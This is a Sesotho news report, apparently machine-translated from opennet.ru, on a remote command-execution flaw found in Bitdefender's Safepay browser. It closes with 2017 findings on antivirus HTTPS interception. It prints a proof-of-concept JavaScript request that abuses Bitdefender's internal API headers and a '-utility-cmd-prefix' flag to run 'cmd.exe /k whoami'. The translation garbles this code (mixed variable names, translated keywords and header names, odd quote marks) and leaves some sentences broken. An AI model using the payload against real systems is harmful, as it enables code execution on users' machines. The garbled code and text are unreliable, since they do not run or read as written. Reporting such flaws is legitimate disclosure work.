Vladimir Palant, moetsi oa Adblock Plus, () ho sebatli se ikhethileng sa Safepay se ipapisitseng le enjine ea Chromium, e fanoeng e le karolo ea sephutheloana sa antivirus sa Bitdefender Total Security 2020 mme se ikemiselitse ho eketsa ts'ireletso ea mosebetsi oa mosebelisi marang-rang a lefats'e (mohlala, ho itšehla thajana ho fanoa ha u fihla libanka le mekhoa ea ho lefa). Ho ba kotsing ho lumella liwebsaete tse butsoeng ho sebatli ho etsa khoutu e sa lebelloang boemong ba sistimi ea ts'ebetso.
Sesosa sa bothata ke hore Bitdefender antivirus e thibela sephethephethe sa HTTPS sebakeng sa heno ka ho nkela setifikeiti sa mantlha sa TLS sa sebaka seo. Setifikeiti se eketsehileng sa motso se kenngoa tsamaisong ea bareki, e leng se etsang hore ho khonehe ho pata ts'ebetso ea mokhoa oa ho hlahloba sephethephethe o sebelisoang. Antivirus e ikamahanya le sephethephethe se sirelelitsoeng ebe e kenya khoutu ea eona ea JavaScript maqepheng a mang ho kenya tšebetsong tšebetso ea Safe Search, 'me haeba ho na le mathata ka setifikeiti sa khokahanyo e sireletsehileng, e nkela leqephe la phoso e khutlisitsoeng sebakeng sa eona. Kaha leqephe le lecha la phoso le fanoa molemong oa seva se buloang, maqephe a mang ho seva eo a na le phihlello e felletseng ea litaba tse kentsoeng ke Bitdefender.
Ha o bula sebaka se laoloang ke mohlaseli, sebaka seo se ka romela XMLHttpRequest 'me sa hlahisa mathata ka setifikeiti sa HTTPS ha se arabela, e leng se tla lebisa ho khutliseng ha leqephe la phoso le sentsoeng ke Bitdefender. Kaha leqephe la phoso le buletsoe moelelong oa sebaka sa mohlaseli, a ka bala litaba tsa leqephe la spoofed ka li-parameter tsa Bitdefender. Leqephe le fanoeng ke Bitdefender le boetse le na le senotlolo sa seboka se u lumellang ho sebelisa Bitdefender API ea kahare ho qala seshene se arohaneng sa sebatli sa Safepay, se totobatsang lifolakha tsa mola oa taelo, le ho qala litaelo tsa sistimi u sebelisa "- utility-cmd-prefix" folakha. Mohlala oa tlatsetso (param1 le param2 ke boleng bo fumanoeng leqepheng la phoso):
var kopo = e ncha XMLHttpRequest();
kopo.open("POST", Math.random());
request.setRequestHeader("Mofuta oa litaba", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada -utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
A re hopoleng hore boithuto bo entsoeng ka 2017 hore lihlahisoa tse 24 ho tse 26 tse lekiloeng tsa antivirus tse hlahlobang sephethephethe sa HTTPS ka spoofing ea setifikeiti li fokolitse boemo ba ts'ireletso ea khokahano ea HTTPS.
Ke lihlahisoa tse 11 feela ho tse 26 tse faneng ka li-cipher suite tsa hajoale. 5 litsamaiso ha lia ka tsa netefatsa litifikeiti (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Lihlahisoa tsa Kaspersky Internet Security le Total Security li ne li ka hlaseloa , 'me lihlahisoa tsa AVG, Bitdefender le Bullguard lia hlaseloa и . Dr.Web Antivirus 11 e u lumella ho khutlela ho li-ciphers tse sa tšepahaleng tsa kantle ho naha (tlhaselo ).
Source: opennet.ru